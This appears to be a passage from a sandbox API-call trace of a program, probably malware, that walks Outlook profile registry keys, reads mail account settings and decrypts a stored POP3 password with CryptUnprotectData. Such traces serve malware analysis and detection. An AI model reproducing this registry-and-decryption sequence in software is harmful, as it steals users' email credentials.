	[0219.667] RegEnumKeyA (in: hKey=0x104, dwIndex=0x1, lpName=0x16ef2d8, cchName=0x400 | out: lpName="0c8c9c3ec3550644a047b86a8ec12a8b") returned 0x0
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a640
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a678
	[0219.668] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390538 | out: hHeap=0x370000) returned 1
	[0219.668] RegEnumKeyA (in: hKey=0x104, dwIndex=0x2, lpName=0x16ef2d8, cchName=0x400 | out: lpName="13dbb0c8aa05101a9bb000aa002fc45a") returned 0x0
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a6b0
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x48) returned 0x3863c0
	[0219.668] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a678 | out: hHeap=0x370000) returned 1
	[0219.668] RegEnumKeyA (in: hKey=0x104, dwIndex=0x3, lpName=0x16ef2d8, cchName=0x400 | out: lpName="1b84e156774e864ab4a15c6403c9f6e3") returned 0x0
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a678
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.668] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3863c0 | out: hHeap=0x370000) returned 1
	[0219.668] RegEnumKeyA (in: hKey=0x104, dwIndex=0x4, lpName=0x16ef2d8, cchName=0x400 | out: lpName="2970052ff0fefa4086a30daf18dd86cf") returned 0x0
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a6e8
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x90) returned 0x39b720
	[0219.668] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.668] RegEnumKeyA (in: hKey=0x104, dwIndex=0x5, lpName=0x16ef2d8, cchName=0x400 | out: lpName="3517490d76624c419a828607e2a54604") returned 0x0
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x38a720
	[0219.668] RegEnumKeyA (in: hKey=0x104, dwIndex=0x6, lpName=0x16ef2d8, cchName=0x400 | out: lpName="8503020000000000c000000000000046") returned 0x0
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x3a6ff8
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xd8) returned 0x39b7b8
	[0219.668] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.668] RegEnumKeyA (in: hKey=0x104, dwIndex=0x7, lpName=0x16ef2d8, cchName=0x400 | out: lpName="8fe7ac01aa79754a8f735e7cc12f5d47") returned 0x0
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x3a7030
	[0219.668] RegEnumKeyA (in: hKey=0x104, dwIndex=0x8, lpName=0x16ef2d8, cchName=0x400 | out: lpName="9207f3e0a3b11019908b08002b2a56c2") returned 0x0
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x3a7068
	[0219.668] RegEnumKeyA (in: hKey=0x104, dwIndex=0x9, lpName=0x16ef2d8, cchName=0x400 | out: lpName="9375CFF0413111d3B88A00104B2A6676") returned 0x0
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x3a70a0
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x138) returned 0x399328
	[0219.668] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b7b8 | out: hHeap=0x370000) returned 1
	[0219.668] RegEnumKeyA (in: hKey=0x104, dwIndex=0xa, lpName=0x16ef2d8, cchName=0x400 | out: lpName="95a84a5145e1b7428591aa8b63570f22") returned 0x0
	[0219.668] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x3a70d8
	[0219.668] RegEnumKeyA (in: hKey=0x104, dwIndex=0xb, lpName=0x16ef2d8, cchName=0x400 | out: lpName="98abf245da169742aaaaf5b0bdd4dea8") returned 0x0
	[0219.669] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x3a7110
	[0219.669] RegEnumKeyA (in: hKey=0x104, dwIndex=0xc, lpName=0x16ef2d8, cchName=0x400 | out: lpName="adf5b6e3c063d3459407b9def7e90514") returned 0x0
	[0219.669] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x3a7148
	[0219.669] RegEnumKeyA (in: hKey=0x104, dwIndex=0xd, lpName=0x16ef2d8, cchName=0x400 | out: lpName="c02ebc5353d9cd11975200aa004ae40e") returned 0x0
	[0219.669] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x3a7180
	[0219.669] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1c8) returned 0x399468
	[0219.669] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399328 | out: hHeap=0x370000) returned 1
	[0219.669] RegEnumKeyA (in: hKey=0x104, dwIndex=0xe, lpName=0x16ef2d8, cchName=0x400 | out: lpName="c5d2c4710d70ab4c8917b715c91bcb5a") returned 0x0
	[0219.669] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x3a71b8
	[0219.669] RegEnumKeyA (in: hKey=0x104, dwIndex=0xf, lpName=0x16ef2d8, cchName=0x400 | out: lpName="ce1460b2d4cad64e96fa40180c6297a9") returned 0x0
	[0219.669] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x3a71f0
	[0219.669] RegEnumKeyA (in: hKey=0x104, dwIndex=0x10, lpName=0x16ef2d8, cchName=0x400 | out: lpName="ddb0922fc50b8d42be5a821ede840761") returned 0x0
	[0219.669] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x3a7228
	[0219.669] RegEnumKeyA (in: hKey=0x104, dwIndex=0x11, lpName=0x16ef2d8, cchName=0x400 | out: lpName="f86ed2903a4a11cfb57e524153480001") returned 0x0
	[0219.669] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x3a7260
	[0219.669] RegEnumKeyA (in: hKey=0x104, dwIndex=0x12, lpName=0x16ef2d8, cchName=0x400 | out: lpName="fdd8a1fc7778114da9ed4f04391d9dea") returned 0x0
	[0219.669] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x3a7298
	[0219.669] RegEnumKeyA (in: hKey=0x104, dwIndex=0x13, lpName=0x16ef2d8, cchName=0x400 | out: lpName="{D9734F19-8CFB-411D-BC59-833E334FCB5E}") returned 0x0
	[0219.669] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x30) returned 0x3a72d0
	[0219.669] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x2a0) returned 0x3a7be0
	[0219.669] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399468 | out: hHeap=0x370000) returned 1
	[0219.669] RegEnumKeyA (in: hKey=0x104, dwIndex=0x14, lpName=0x16ef2d8, cchName=0x400 | out: lpName="{D9734F19-8CFB-411D-BC59-833E334FCB5E}") returned 0x103
	[0219.669] RegCloseKey (hKey=0x104) returned 0x0
	[0219.669] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.669] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.669] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.669] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\0a0d020000000000c000000000000046", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.669] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="{D9734F19-8CFB-411D-BC59-833E334FCB5E}") returned 0x103
	[0219.670] RegCloseKey (hKey=0x104) returned 0x0
	[0219.670] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.670] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.670] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.670] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.670] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\0c8c9c3ec3550644a047b86a8ec12a8b", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.670] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="{D9734F19-8CFB-411D-BC59-833E334FCB5E}") returned 0x103
	[0219.670] RegCloseKey (hKey=0x104) returned 0x0
	[0219.670] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.670] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.670] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.670] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.670] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.670] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="{D9734F19-8CFB-411D-BC59-833E334FCB5E}") returned 0x103
	[0219.670] RegCloseKey (hKey=0x104) returned 0x0
	[0219.670] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.670] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.670] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.670] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.670] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\1b84e156774e864ab4a15c6403c9f6e3", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.670] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="{D9734F19-8CFB-411D-BC59-833E334FCB5E}") returned 0x103
	[0219.670] RegCloseKey (hKey=0x104) returned 0x0
	[0219.670] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.670] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.670] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.670] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.671] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\2970052ff0fefa4086a30daf18dd86cf", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.671] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="{D9734F19-8CFB-411D-BC59-833E334FCB5E}") returned 0x103
	[0219.671] RegCloseKey (hKey=0x104) returned 0x0
	[0219.671] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.671] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.671] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.671] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.671] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.671] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="{D9734F19-8CFB-411D-BC59-833E334FCB5E}") returned 0x103
	[0219.671] RegCloseKey (hKey=0x104) returned 0x0
	[0219.671] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.671] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.671] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.671] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.671] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\8503020000000000c000000000000046", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.671] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="{D9734F19-8CFB-411D-BC59-833E334FCB5E}") returned 0x103
	[0219.671] RegCloseKey (hKey=0x104) returned 0x0
	[0219.671] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.671] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.671] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.671] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.671] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\8fe7ac01aa79754a8f735e7cc12f5d47", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.671] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="{D9734F19-8CFB-411D-BC59-833E334FCB5E}") returned 0x103
	[0219.671] RegCloseKey (hKey=0x104) returned 0x0
	[0219.671] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.671] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.672] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.672] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.672] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.672] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="{D9734F19-8CFB-411D-BC59-833E334FCB5E}") returned 0x103
	[0219.672] RegCloseKey (hKey=0x104) returned 0x0
	[0219.672] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b720 | out: hHeap=0x370000) returned 1
	[0219.672] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x60) returned 0x39b6b8
	[0219.672] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8f) returned 0x39b720
	[0219.672] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b6b8 | out: hHeap=0x370000) returned 1
	[0219.672] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", phkResult=0x16ef84c | out: phkResult=0x16ef84c*=0x104) returned 0x0
	[0219.672] RegEnumKeyA (in: hKey=0x104, dwIndex=0x0, lpName=0x16ef2d8, cchName=0x400 | out: lpName="00000001") returned 0x0
	[0219.672] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x39b7b8
	[0219.672] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xbf) returned 0x399328
	[0219.672] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b7b8 | out: hHeap=0x370000) returned 1
	[0219.672] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", phkResult=0x16ef800 | out: phkResult=0x16ef800*=0x138) returned 0x0
	[0219.672] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x20119, phkResult=0x16ef2b4 | out: phkResult=0x16ef2b4*=0x13c) returned 0x0
	[0219.672] RegQueryValueExA (in: hKey=0x13c, lpValueName="Email", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x0, lpcbData=0x16ef868*=0x0 | out: lpType=0x16ef2b0*=0x0, lpData=0x0, lpcbData=0x16ef868*=0x0) returned 0x2
	[0219.672] RegCloseKey (hKey=0x13c) returned 0x0
	[0219.672] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399328 | out: hHeap=0x370000) returned 1
	[0219.672] RegEnumKeyA (in: hKey=0x104, dwIndex=0x1, lpName=0x16ef2d8, cchName=0x400 | out: lpName="00000002") returned 0x0
	[0219.672] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x39b7b8
	[0219.672] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xbf) returned 0x399328
	[0219.672] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b7b8 | out: hHeap=0x370000) returned 1
	[0219.672] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", phkResult=0x16ef800 | out: phkResult=0x16ef800*=0x13c) returned 0x0
	[0219.673] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x20119, phkResult=0x16ef2b4 | out: phkResult=0x16ef2b4*=0x140) returned 0x0
	[0219.673] RegQueryValueExA (in: hKey=0x140, lpValueName="Email", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x0, lpcbData=0x16ef868*=0x0 | out: lpType=0x16ef2b0*=0x0, lpData=0x0, lpcbData=0x16ef868*=0x0) returned 0x2
	[0219.673] RegCloseKey (hKey=0x140) returned 0x0
	[0219.673] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x399328 | out: hHeap=0x370000) returned 1
	[0219.673] RegEnumKeyA (in: hKey=0x104, dwIndex=0x2, lpName=0x16ef2d8, cchName=0x400 | out: lpName="00000003") returned 0x0
	[0219.673] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x39b7b8
	[0219.673] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xbf) returned 0x399328
	[0219.673] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39b7b8 | out: hHeap=0x370000) returned 1
	[0219.673] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", phkResult=0x16ef800 | out: phkResult=0x16ef800*=0x140) returned 0x0
	[0219.673] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x16ef2b4 | out: phkResult=0x16ef2b4*=0x144) returned 0x0
	[0219.673] RegQueryValueExA (in: hKey=0x144, lpValueName="Email", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x0, lpcbData=0x16ef868*=0x0 | out: lpType=0x16ef2b0*=0x3, lpData=0x0, lpcbData=0x16ef868*=0x18) returned 0x0
	[0219.673] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x20000
	[0219.673] RegQueryValueExA (in: hKey=0x144, lpValueName="Email", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x20000, lpcbData=0x16ef868*=0x18 | out: lpType=0x16ef2b0*=0x3, lpData=0x20000*, lpcbData=0x16ef868*=0x18) returned 0x0
	[0219.673] RegCloseKey (hKey=0x144) returned 0x0
	[0219.673] VirtualFree (lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.674] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x16ef2b4 | out: phkResult=0x16ef2b4*=0x144) returned 0x0
	[0219.674] RegQueryValueExA (in: hKey=0x144, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x0, lpcbData=0x16ef868*=0x0 | out: lpType=0x16ef2b0*=0x3, lpData=0x0, lpcbData=0x16ef868*=0xe) returned 0x0
	[0219.674] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x20000
	[0219.674] RegQueryValueExA (in: hKey=0x144, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x20000, lpcbData=0x16ef868*=0xe | out: lpType=0x16ef2b0*=0x3, lpData=0x20000*, lpcbData=0x16ef868*=0xe) returned 0x0
	[0219.674] RegCloseKey (hKey=0x144) returned 0x0
	[0219.674] VirtualFree (lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.674] SetLastError (dwErrCode=0x0) 
	[0219.674] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20019, phkResult=0x16ef2bc | out: phkResult=0x16ef2bc*=0x144) returned 0x0
	[0219.674] RegQueryValueExA (in: hKey=0x144, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x16ef2b8, lpcbData=0x16ef2b4*=0x4 | out: lpType=0x16ef2b0*=0x0, lpData=0x16ef2b8*=0x0, lpcbData=0x16ef2b4*=0x4) returned 0x2
	[0219.675] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x16ef2b4 | out: phkResult=0x16ef2b4*=0x148) returned 0x0
	[0219.675] RegQueryValueExA (in: hKey=0x148, lpValueName="POP3 User", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x0, lpcbData=0x16ef868*=0x0 | out: lpType=0x16ef2b0*=0x3, lpData=0x0, lpcbData=0x16ef868*=0xa) returned 0x0
	[0219.675] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x20000
	[0219.675] RegQueryValueExA (in: hKey=0x148, lpValueName="POP3 User", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x20000, lpcbData=0x16ef868*=0xa | out: lpType=0x16ef2b0*=0x3, lpData=0x20000*, lpcbData=0x16ef868*=0xa) returned 0x0
	[0219.675] RegCloseKey (hKey=0x148) returned 0x0
	[0219.675] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3a1898
	[0219.675] VirtualFree (lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.675] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x400) returned 0x3a7e88
	[0219.675] RegQueryValueExA (in: hKey=0x140, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x16ef744, lpData=0x3a7e88, lpcbData=0x16ef80c*=0x400 | out: lpType=0x16ef744*=0x3, lpData=0x3a7e88*, lpcbData=0x16ef80c*=0x101) returned 0x0
	[0219.675] CryptUnprotectData (in: pDataIn=0x16ef278, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0x16ef270 | out: ppszDataDescr=0x0, pDataOut=0x16ef270) returned 1
	[0219.678] LocalFree (hMem=0x3a1960) returned 0x0
	[0219.678] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3a1960
	[0219.678] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a7e88 | out: hHeap=0x370000) returned 1
	[0219.678] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a1898 | out: hHeap=0x370000) returned 1
	[0219.678] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x16ef2b4 | out: phkResult=0x16ef2b4*=0x158) returned 0x0
	[0219.678] RegQueryValueExA (in: hKey=0x158, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x0, lpcbData=0x16ef868*=0x0 | out: lpType=0x16ef2b0*=0x0, lpData=0x0, lpcbData=0x16ef868*=0x0) returned 0x2
	[0219.678] RegCloseKey (hKey=0x158) returned 0x0
	[0219.679] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20119, phkResult=0x16ef2b4 | out: phkResult=0x16ef2b4*=0x158) returned 0x0
	[0219.679] RegQueryValueExA (in: hKey=0x158, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x0, lpcbData=0x16ef868*=0x0 | out: lpType=0x16ef2b0*=0x3, lpData=0x0, lpcbData=0x16ef868*=0xc) returned 0x0
	[0219.679] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x20000
	[0219.679] RegQueryValueExA (in: hKey=0x158, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x16ef2b0, lpData=0x20000, lpcbData=0x16ef868*=0xc | out: lpType=0x16ef2b0*=0x3, lpData=0x20000*, lpcbData=0x16ef868*=0xc) returned 0x0
	[0219.679] RegCloseKey (hKey=0x158) returned 0x0
	[0219.679] VirtualFree (lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.679] SetLastError (dwErrCode=0x0) 
	[0219.679] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0x20019, phkResult=0x16ef2bc | out: phkResult=0x16ef2bc*=0x158) returned 0x0
